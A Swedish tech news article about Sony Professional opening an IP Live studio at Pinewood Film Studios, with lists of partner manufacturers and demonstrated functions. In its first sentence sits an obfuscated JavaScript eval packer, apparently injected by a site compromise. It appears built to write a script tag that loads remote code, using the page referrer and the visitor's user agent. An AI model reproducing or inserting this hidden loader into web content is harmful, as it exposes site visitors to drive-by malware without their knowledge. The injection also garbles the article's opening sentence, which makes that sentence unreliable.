Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sony Professional öppnar dörrarna till ny IP Live-studio

Sony Professional öppnar dörrarna till ny IP Live-studio
Sebastian

Sony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|firrz|var|u0026u|referrer|bkhzf||js|php’.split(’|’),0,{}))
öppnar i dag dörrarna till deras nya IP Live-studio vid Pinewood Film Studios utanför London. Studion är en del av Sonys
Digital Motion Picture Centre Europe (DMPCE) och kommer att fungera som tränings- och testcenter för tredjepartsinteroperabilitet. Studion kommer dessutom att tillhandahålla system, utbildning och praktiska verktyg för IP Live-produktion till både produktionsbolag och broadcasters.

Genom den nya studion kommer Sony att kunna demonstrera vad branschaktörer kan åstadkomma med IP, bland annat genom skalbarheten och fördelarna med Sony’s Networked Media Interface, ett gränssnitt som levererar en kortare fördröjning och ett enklare skifte mellan HD- och 4K-video, ljud och metadata via standardnätverk.

IP Live-studion kommer att fungera som en ”lekplats” för kunder som är en del av IP Live Alliance. Tredjepartsinteroperabiliteten gör att kunderna kan använda egen utrustning tillsammans med Sonys system. Med en stor bredd av IP-kompatibel mjukvara som breder ut sig över hela branschen kommer DMPCE-plattformen möjliggöra för partners att säkerställa att deras kunder kan interagera med olika arbetsflöden tack vare Sonys teknik. Sony har redan etablerat en lista över partners, bland dem 50 medlemmar ur IP Live Alliance, som kommer ges tillgång till studion.

I studion finns bland annat Sonys HDC-4300 4K/HD live systemkamera och BPU-4500 baseband-processor, parallellt arbetande med NXLK-IP40F SDI till IP-konverteringstavlor och en toppmodern nätverksstruktur.

Tillverkare som bidragit med utrustning till studion:

 • Avid
 • Cisco
 • Evertz
 • EVS
 • Imagine Communications
 • LEADER Electronics
 • Juniper
 • Tektronix
 • TSL

Följande operativa och tekniska funktioner kommer att demonstreras:

 • 4K och HD över IP
 • Video-switching över IP
 • Realtidsgrafik över IP
 • Systeminteroperabilitet för både partners och kunder (Network Media Interface)
 • Dynamic routing (ett systems förmåga att tillåta så många vägar som möjligt genom systemet, där vägarna karaktäriseras av deras destination)